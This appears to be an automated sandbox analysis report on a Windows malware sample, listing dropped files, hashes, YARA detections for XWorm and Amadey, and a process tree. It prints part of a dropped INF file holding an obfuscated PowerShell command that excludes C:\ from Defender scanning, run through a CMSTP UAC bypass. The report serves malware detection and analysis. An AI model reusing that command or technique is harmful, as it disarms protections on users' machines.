                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3427
                                                                                                                                            Entropy (8bit):3.773425184432956
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:RX688P1dblhcpvwvJu82tiKkCdfc1AGlEDA4MZAe2L7Hht:0PP1dphcpvcJu1iQf7fDSm7HL
                                                                                                                                            MD5:FFDA4986633EF3215A7C6F5DFC053648
                                                                                                                                            SHA1:4C6BCD108D77D2C1B29F339A9111C0A11F85D721
                                                                                                                                            SHA-256:F563A48E7850FD7E602459A4A51A76C1AFEBD04CCA53EC301003B0DDDEECA842
                                                                                                                                            SHA-512:4B5CC439AE1FB5AAE703A07043F841FA72DE610BD3D144699791EFBCE178682FEB40920CDA57D003685EE5EA29184310291019D5238CB3ED12F729F8F352F92D
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1203559
                                                                                                                                            Entropy (8bit):6.37383440477572
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:bYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94o:yGUhni7iSFCQ9X
                                                                                                                                            MD5:FE0DF3346232B47B76BB20F85900D8C2
                                                                                                                                            SHA1:21CA0B32E39EAEE2F21698EF5912EF8E9418AED7
                                                                                                                                            SHA-256:B097953351A17692EA89A98F9114246A8685291020E3F40388754D5552ED19BB
                                                                                                                                            SHA-512:75DDBAF4BC249DFE7CAF0F2E2EA9275C43CB8FC5BBD97D293E396F31DB1395BA12DBC0F5E5792C20F1D10EE5378A4B4005B112F851AB870EC12FD50680FF9803
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1994010
                                                                                                                                            Entropy (8bit):7.240581605798372
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:kDfYXoYi50pMq0MI5F6E178BQh/GN8FzJ0y2f0IHii:kDfY4By7PILT178u/hzrJIHii
                                                                                                                                            MD5:48BFA0E8C3A2473A3D7E7C0B6238C22E
                                                                                                                                            SHA1:98F1E5793849E7FDE52024A45A5DB89E9B8CD811
                                                                                                                                            SHA-256:4988087CF45A09299DD128EEF754CF7DB3252313DD8D274CC5F5F327C3B34C20
                                                                                                                                            SHA-512:661D59F142D24FF096A254F52115872886514C6A5AB3B2CE2C1965AE197490F08D93D8D092B6F78A6BFFD54B59A9C8D48199C6CCAB9E7E9FEAF3DB097043D4AC
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):560640
                                                                                                                                            Entropy (8bit):7.990855037191198
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:12288:9sVAAmc9HgyWZxASgVM9XM7Fn27bPJoUqN2NRJWizpAXEFjiOoE:9srmciyYV0MVsFgoUqNyRQyGXEti
                                                                                                                                            MD5:75C2C9D60104BA3C4271B2A629E90023
                                                                                                                                            SHA1:42F5E05283A1469F2F79400AAC3027231A937F2F
                                                                                                                                            SHA-256:34657C958EE4B7C1A99BD6A1A15CCCE2EC7046568428AA4A365AE4BC825A8363
                                                                                                                                            SHA-512:578AA899F7FFF7CE323DD6E3B1781AAB4FAA4A2292CF7F60DF370843448EDA1A998D0F09CCBEA0F52E83C5E9AAC7533206D42C976CB4A8732FEA9D614C9AD27B
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):482304
                                                                                                                                            Entropy (8bit):3.1342365717789904
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:4FAvjMvA4v2Oh9R8DZqYplTTiX5Ak6kGyR8W5lHbRAnEmmOJOh4Zg:NjMvA4fh9qDZqYOXYyRR5lb2nEQj
                                                                                                                                            MD5:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            SHA1:6DBA3A3B96225FE24229F1B39509A503547D1401
                                                                                                                                            SHA-256:B2ACD91FDCEF767FA027519E3BE0F61CE027C8BDF57027E2C161257DFA5D6543
                                                                                                                                            SHA-512:9DF54DF59FE341C0719C0D329DB4D2810DE385F133E210D6046DEB06F94BC3A3C5591A7E52906F91E93DAFB2ADC110021354FDA505B64A974274DC03E83ED4C9
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, Author: Joe Security
                                                                                                                                            • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, Author: Sekoia.io
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t}g................................. ........@.. ....................................@.................................X...S................................................................................... ............... ..H............text........ ...................... ..`.rsrc..............................@..@.reloc...............Z..............@..B........................H........s..XX......$.....................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):482304
                                                                                                                                            Entropy (8bit):3.1342365717789904
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:4FAvjMvA4v2Oh9R8DZqYplTTiX5Ak6kGyR8W5lHbRAnEmmOJOh4Zg:NjMvA4fh9qDZqYOXYyRR5lb2nEQj
                                                                                                                                            MD5:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            SHA1:6DBA3A3B96225FE24229F1B39509A503547D1401
                                                                                                                                            SHA-256:B2ACD91FDCEF767FA027519E3BE0F61CE027C8BDF57027E2C161257DFA5D6543
                                                                                                                                            SHA-512:9DF54DF59FE341C0719C0D329DB4D2810DE385F133E210D6046DEB06F94BC3A3C5591A7E52906F91E93DAFB2ADC110021354FDA505B64A974274DC03E83ED4C9
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t}g................................. ........@.. ....................................@.................................X...S................................................................................... ............... ..H............text........ ...................... ..`.rsrc..............................@..@.reloc...............Z..............@..B........................H........s..XX......$.....................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1994010
                                                                                                                                            Entropy (8bit):7.240581605798372
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:kDfYXoYi50pMq0MI5F6E178BQh/GN8FzJ0y2f0IHii:kDfY4By7PILT178u/hzrJIHii
                                                                                                                                            MD5:48BFA0E8C3A2473A3D7E7C0B6238C22E
                                                                                                                                            SHA1:98F1E5793849E7FDE52024A45A5DB89E9B8CD811
                                                                                                                                            SHA-256:4988087CF45A09299DD128EEF754CF7DB3252313DD8D274CC5F5F327C3B34C20
                                                                                                                                            SHA-512:661D59F142D24FF096A254F52115872886514C6A5AB3B2CE2C1965AE197490F08D93D8D092B6F78A6BFFD54B59A9C8D48199C6CCAB9E7E9FEAF3DB097043D4AC
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...>Sr?.6..g.....&"...+.V...2...... ................................................N....`... ......................................@..q....P...................k..............l...............................(...................pW..0............................text....T.......V..................`..`.data........p.......Z..............@....rdata..0f.......h...f..............@..@.pdata...k.......l..................@..@.xdata..`....`.......:..............@..@.bss.........0...........................edata..q....@......................@..@.idata.......P... ..................@....CRT....`....p....... ..............@....tls................."..............@....reloc..l............$..............@..B........................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe
                                                                                                                                            File Type:Windows setup INFormation
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1925
                                                                                                                                            Entropy (8bit):4.832236717876804
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:O4zOtPxXo+mXdjsX/XNXyXNXb+tXNX6fXFZr+iJTO1x4FsXX6X8YXo+mXdjsX/Xy:tOBa9PBxexoa9PBxeLeeh+Ec4Cw+
                                                                                                                                            MD5:B700B34C4408FE754C25F40AB6D14AFA
                                                                                                                                            SHA1:81707E8507A95D869F6522A3FE1BBC3A3887C369
                                                                                                                                            SHA-256:82C1F68551F47D6DBEF4F05981E961786DD06018658648073A32236DCA43DEF2
                                                                                                                                            SHA-512:CE4CA698F3142E87EA00A8795D2EF4980D5C778D1D05833692E40370A9E5A20D6C76E6B3AFDEEB3C5D21495CA0CC9FE5CB825389F92CEAFC94CDE32EFD8B80F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[version]..Signature=$chicago$..AdvancedINF=2.5....[DefaultInstall]..CustomDestination=CustInstDestSectionAllUsers..RunPreSetupCommands=RunPreSetupCommandsSection....[RunPreSetupCommandsSection]..powershell.exe -exec bypass "[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):55
                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):284
                                                                                                                                            Entropy (8bit):3.387525912887948
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:djtjTXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0ldQ0ut0:RFf2RKQ1CGAFAjzvYRQVfut0
                                                                                                                                            MD5:9BA14D9B1DF936DFF4C76AF024DBA490
                                                                                                                                            SHA1:2C40CEFB1A2204333FC02487ECF1924088466124
                                                                                                                                            SHA-256:94ED8D6EE8812C0566D098AF6734DC750A227902A887010694304F8F00D826BA
                                                                                                                                            SHA-512:DC83C340304855D19D1FC1F376BDA50D11419D0F4CE955E9E6F1EE165B44961FF58B6CAB0BA36939AA96F61F1B2B73406F8B90230F6B150C537FAB35A9E3CC29
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.... ..J..N...q.,..F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................,.@3P.........................
                                                                                                                                            Process:C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14544
                                                                                                                                            Entropy (8bit):6.2660301556221185
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):6.66194464256937
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:file.exe
                                                                                                                                            File size:3'198'976 bytes
                                                                                                                                            MD5:38560b590890a37ab8460092560d282c
                                                                                                                                            SHA1:2564dac98b8ed26fccaed9764f172c9123e50f2b
                                                                                                                                            SHA256:014857e05f8c8abace4ccf74a6e613a755a651d724c510dc5959bea75295f53b
                                                                                                                                            SHA512:5a5b0869092b690ac373d03916142c454d88fcb7abd26ceebe738e2df1d09416f19e0f73163050f1e45c3daba980b1714193a79cab84661277d11b455326f368
                                                                                                                                            SSDEEP:49152:0RDfGY4MzqVDFDJKt+yEVlISupM+Gr9Jcx2gKG:sbGY4M8JDJy+yEVubM+GBJc8
                                                                                                                                            TLSH:C4E529D2E5057ECFE49A1EB84437CDC2586E13E58B2148D7983868BFBE63CC126B7914
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                            Entrypoint:0x70e000
                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:6
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:6
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:6
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                            Instruction
                                                                                                                                            jmp 00007FC408DDB1CAh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x5d4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x30bbbc | 0x10 | mrenudwa
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x30bb6c | 0x18 | mrenudwa
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x68000 | 0x68000 | 72c56efec0aab1e3f2243d19036cfe7d | False | 0.5587862454927884 | data | 7.060098617572218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x69000 | 0x5d4 | 0x400 | cd3d39f0e07a9b0255e18aab6529d24b | False | 0.7080078125 | data | 5.837091489197324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mrenudwa | 0x6b000 | 0x2a2000 | 0x2a1200 | b4f1881417e801265245b0870a71f2ee | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qxwztaye | 0x30d000 | 0x1000 | 0x600 | 1b2f33273b69ab7a97b0154993ce089d | False | 0.5390625 | data | 4.863599174609183 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x30e000 | 0x3000 | 0x2200 | e8e2b0fe84a8e9f12af026ac5395e558 | False | 0.05503216911764706 | DOS executable (COM) | 0.5955219622088251 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x30bbcc | 0x3e4 | XML 1.0 document, ASCII text |  |  | 0.48092369477911645
RT_MANIFEST | 0x30bfb0 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
kernel32.dll | lstrcpy
Language of compilation system | Country where language is spoken
English | United States
                                                                                                                                            Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.


                                                                                                                                            Target ID:0
                                                                                                                                            Start time:17:43:04
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                            Imagebase:0xe50000
                                                                                                                                            File size:3'198'976 bytes
                                                                                                                                            MD5 hash:38560B590890A37AB8460092560D282C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:1
                                                                                                                                            Start time:17:43:05
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:3'198'976 bytes
                                                                                                                                            MD5 hash:38560B590890A37AB8460092560D282C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:17:44:00
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:3'198'976 bytes
                                                                                                                                            MD5 hash:38560B590890A37AB8460092560D282C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:17:44:07
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe"
                                                                                                                                            Imagebase:0x60000
                                                                                                                                            File size:27'136 bytes
                                                                                                                                            MD5 hash:86268AF17C4C5AFF970734EB5775A7F8
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.3336204963.0000000002486000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 16%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:17:44:09
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\cmstp.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.inf
                                                                                                                                            Imagebase:0xb0000
                                                                                                                                            File size:81'920 bytes
                                                                                                                                            MD5 hash:D7AABFAB5BEFD53BA3A27BD48F3CC675
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:9
                                                                                                                                            Start time:17:44:10
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe"
                                                                                                                                            Imagebase:0x110000
                                                                                                                                            File size:560'640 bytes
                                                                                                                                            MD5 hash:75C2C9D60104BA3C4271B2A629E90023
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:17:44:11
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                            File size:55'320 bytes
                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:17:44:12
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe"
                                                                                                                                            Imagebase:0xc70000
                                                                                                                                            File size:1'863'680 bytes
                                                                                                                                            MD5 hash:89CF32E94C9A6312D70F99607678E53F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:17:44:17
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'714'462 bytes
                                                                                                                                            MD5 hash:68D36FA633B4FB19D5C5B285C9A0B415
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 3%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:13
                                                                                                                                            Start time:17:44:17
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp" /SL5="$30528,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'181'184 bytes
                                                                                                                                            MD5 hash:BCC236A3921E1388596A42B05686FF5E
                                                                                                                                            Has elevated privileges:true
